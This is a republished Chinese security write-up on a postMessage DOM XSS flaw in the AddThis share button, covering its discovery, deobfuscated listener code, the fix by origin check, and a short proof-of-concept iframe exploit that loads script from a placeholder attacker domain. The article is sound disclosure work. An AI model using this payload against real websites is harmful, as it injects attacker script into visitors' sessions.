51CTO首页
AI.x社区
博客
学堂
精品班
直播训练营
企业培训
鸿蒙开发者社区
WOT技术大会
AIGC创新中国行
公众号矩阵
移动端
短视频免费课程课程排行直播课软考学堂
全部课程厂商认证IT技术2024年软考PMP项目管理软考资讯
在线学习
文章资源问答课堂专栏直播
51CTO
鸿蒙开发者社区
51CTO技术栈
51CTO官微
51CTO学堂
51CTO博客
CTO训练营
鸿蒙开发者社区订阅号
51CTO题库小程序
51CTO学堂APP
51CTO学堂企业版APP
鸿蒙开发者社区视频号
账号设置 退出

流行应用AddThis存在postMessage XSS漏洞漏洞,百万站点受影响

作者:鸢尾
安全 漏洞
AddThis是一款拥有超过一百万用户使用的网页分享按钮。在今年早些被发现存在XSS漏洞。在之前的一篇文章有描述到postMessage API缺陷。而本文将描述我是如何识别然后利用AddThis分享按钮中存在的这些漏洞。

AddThis是一款拥有超过一百万用户使用的网页分享按钮。在今年早些被发现存在XSS漏洞。在之前的一篇文章有描述到postMessage API缺陷。而本文将描述我是如何识别然后利用AddThis分享按钮中存在的这些漏洞。

[[179806]]

当我在测试一个使用AddThis的网站的时候,透过Chrome开发者工具的全局监听器,我注意到它使用了postMessage。

使用AddThis的网站的时候使用了postMessage

为了判断它们是否存在漏洞,我在Chrome开发者工具中的的监听器内设置了一个断点,之后使用

  1. window.postMessage("hello", "*") 

向页面发送消息

检查监听器

代码没有进行来源检查,除此之外来源必须是HTTP/HTTPS页面。从5364行可以得知消息的预期格式:

  1. at-share-bookmarklet:DATA. 

应用AddThis检查监听器

继续进行调试,我们以合适的格式发送消息,使代码在5370行结束,调用r函数。

完成对r函数的调用之后接着调用s函数:

应用AddThis检查监听器

说起S函数就非常有趣。它似乎创建了一个新的脚本元素(或许是DOM XSS?)

应用AddThis检查监听器

反压缩

为了理解这个函数的作用,我通过命名变量和删除多行语句来进行反混淆。

  1. e.exports = function(messageData, t, n, s, u, isTrue) { 
  2. if (!o[messageData] || isTrue) { //isTrue is 1 (true) when this function is called. 
  3. var scriptTag = document.createElement("script"); 
  4. if("https:" === window.location.protocol){ 
  5. var isSecurePage = true
  6. }else{ 
  7. var isSecurePage = false
  9. var protocol = ""
  10. var headElement = document.getElementsByTagName("head")[0]; 
  11. scriptTag.setAttribute("type", "text/javascript"); 
  12. scriptTag.setAttribute("async", "async"); 
  13. //Check if user is using Chrome/Safari 
  14. if(window.chrome && window.chrome.self || window.safari && window.safari.extension){ 
  15. if(isSecurePage){ 
  16. protocol = "https"
  17. }else{ 
  18. protocol = "http"
  20. //If the message data starts with "//", add protocol before 
  21. if(0 === messageData.indexOf("//")){ 
  22. messageData = protocol + messageData; 
  25. //If the message data starts with "//" 
  26. if(0 === messageData.indexOf("//")){ 
  27. scriptTag.src = messageData
  28. }else{ 
  29. scriptTag.src = protocol + "//s7.addthis.com/" + messageData; 
  31. headElement.insertBefore(scriptTag, headElement.firstChild); 
  32. o[messageData] = 1; 
  33. return scriptTag; 
  35. return 1; 

阅读经过反压缩的代码版本,可以得出结论,发送消息的格式大抵如此:

  1. at-share-bookmarklet://ATTACKERHOST/xss.js 

它会新增一个新的脚本元素到包含了“//ATTACKERDOMAIN/xss.js”的页面。换句话说,存在DOM XSS漏洞。

POC

攻击者能够攻击任何使用了AddThis的网站(存在DOM XSS)。给出我写的exploit供大家参考:

  1. <iframe id="frame" src="https://targetpage/using_addthis"></iframe> 
  2. <script> 
  3. document.getElementById("frame").postMessage('at-share-bookmarklet://ATTACKERDOMAIN/xss.js', '*'); 
  4. </script> 

 

修复

我和Matt Abrams(AddThis的CTO)进行了交流,他保证会尽快修复该漏洞并及时推送给终端用户。该修复方案增加了一个来源检查以确保消息不会从未知来源发出。

总结

简言之,postMessage通常会导致DOM XSS漏洞。如果你正在使用第三方脚本,一定要去检查下postMessage实现。

责任编辑:赵宁宁 来源: FreeBuf
AddThispostMessage XSS漏洞
相关推荐
Elementor WordPress 插件存在漏洞,可能影响 50 万个站点
悉,尽管利用该漏洞时需要身份验证,但任何登录到有漏洞网站的用户都可以利用它,包括普通用户。另外,安全研究人员认为,未登录的用户也可以利用该漏洞,但是尚未证实这种情况。

2022-04-14 16:37:50

漏洞网络攻击插件
MOVEit再现新漏洞,多个版本受影响
ProgressSoftware已为所有主要MOVEitTransfer版本提供了必要的更新,强烈建议用户更新到MOVEitTransfer的最新版本,以降低这些漏洞带来的风险。

2023-07-10 21:25:20

App Store存在大量欺诈应用百万iOS用户受影响
苹果官方表示每天审核超过10万款新应用和应用更新申请,而严苛的审查制度让其只有60%可以通过上架。即便如此,AppStore依然充斥着大量欺诈类应用,为这些应用的开发者带来大量收入的同时,由于30%的佣金让苹果也分得其中一杯羹。

2022-07-20 16:04:15

iOS苹果App Store
安全启动存在严重漏洞,几乎所有Linux和Windows设备受影响
今日,网络安全研究人员披露了一个新的高风险漏洞的详细信息。该漏洞影响了全球数十亿设备,几乎波及所有正在运行Linux发行版或Windows系统的服务器、工作站,笔记本电脑,台式机及IoT系统。

2020-07-30 23:17:45

漏洞网络安全攻击
Ubuntu 曝Linux漏洞,近 40% 用户受影响
Wiz研究人员警告称这两个漏洞源于Ubuntu对OverlayFS模块的单独更改,都针对Ubuntu内核,目前针对这些漏洞的武器化攻击已经公开。

2023-07-27 16:48:13

BrakTooth漏洞影响百万蓝牙设备
最近研究人员发现了商业BT栈中的多个安全漏洞——BrakTooth,攻击者利用该漏洞可以发起DoS、任意代码执行等共计。

2021-09-05 05:59:00

BrakTooth漏洞蓝牙设备
应用Truecaller存在远程利用漏洞影响一亿安卓设备
猎豹移动安全研究实验室的安全研究人员发现呼叫管理应用程序Truecaller存在严重漏洞。

2016-03-29 10:48:53

uClibc DNS曝安全漏洞,致使全球数百万物联网设备遭受影响
该漏洞还影响所有版本的uClibcng库的域名系统(DNS),uClibcng库是专门为关键基础设施部门路由器的通用操作系统OpenWRT设计的分支。

2022-05-05 11:33:10

漏洞网络攻击网络安全
HTC安卓手机存重大漏洞 多款机型受影响
10月4日消息,据国外媒体报道,安全研究专家宣称他们发现宏达电的部分Android手机的记录程序不够安全,可轻易被黑客破解,从而取得完整个人资料。

2011-10-09 15:03:15

手机
详解OpenSSL重大漏洞:谁会受影响?如何解决?
近日有研究人员公布,广为流行的网络加密软件OpenSSL存在名为Heartbleed的重大漏洞,人们的账号密码、信用卡号码等个人信息可能会失窃。各大主流网站都在加紧解决这一问题。究竟是什么回事呢普通网民是否会受到影响呢国外媒体近日就这类疑问一一进行了详解。

2014-04-09 14:41:55

Linux发行版受影响,Sudo被爆高危漏洞
近日,安全研究人员披露Studo的漏洞细节,称该漏洞可能会被攻击者利用,在众多基于Linux的发行版本中获得最高的root权限。

2021-01-28 17:32:44

Sudo漏洞Linux发行版
微软爆DirectX严重漏洞 Windows7不受影响
微软今天发布警告表示,一个Windows操作系统种的关键安全漏洞已经被黑客利用来远程执行恶意代码。

2009-05-30 10:04:56

SAP Afaria产品曝严重漏洞 大量移动设备受影响
Afaria是德国SAP软件公司开发的一个移动设备管理(MDM)解决方案,是目前市场上最为流行的MDM解决方案,大约有6300个企业用它管理着1亿300万的移动设备。

2015-09-23 11:42:20

WordPress插件爆出漏洞 170万网站恐受影响
最近,安全研究公司Sucuri表示,一个流行的Wordpress插件MailPoet被怀疑可能存在漏洞,能够让黑客取得对站点的完全控制。

2014-07-22 10:43:16

Electron 被曝远程代码执行漏洞,Discord、Notion、Teams 受影响
日前在拉斯维加斯举行的黑帽网络安全大会(BlackHatcybersecurityconference)上,安全研究人员在流行的应用软件如Discord、MicrosoftTeams、Slack,和其他许多应用的底层框架中发现了一系列的漏洞,这些应用被全世界数千万人使用。

2022-08-15 08:28:52

漏洞底层框架Electron
WordPress插件曝新漏洞,超过200万个网站受影响
在发现安全漏洞后,安全人员敦促WordPress高级自定义插件的用户更新版本6.1.6。

2023-05-08 19:28:11

HP OMEN驱动漏洞影响百万HP设备
SentinelLabs安全研究人员在HPOMEN驱动中发现了一个高危漏洞,漏洞CVE编号为CVE20213437,CVSS评分为7.8分。

2021-09-17 11:03:25

HP OMEN漏洞攻击
WordPress再曝流行插件漏洞 影响上千万网站
WordPress的一个最为流行的插件现重大安全漏洞,导致上千万网站面临黑客入侵的危险。

2015-03-13 09:20:57

微软发布IE严重漏洞补丁 Win 7 RC受影响
微软本周二在补丁周期之外发布了一个安全补丁(编号是MS09034),以修复IE浏览器中的远程安全漏洞。

2009-07-29 08:46:13

Windows 7系统漏洞系统安全
微软证实IE曝严重安全漏洞 所有版本受影响
互联网安全公司FireEye称,该漏洞已经被黑客利用,并对一些美国公司发动了攻击。

2014-04-29 11:18:27

点赞
收藏

51CTO技术栈公众号

业务
速览
在线客服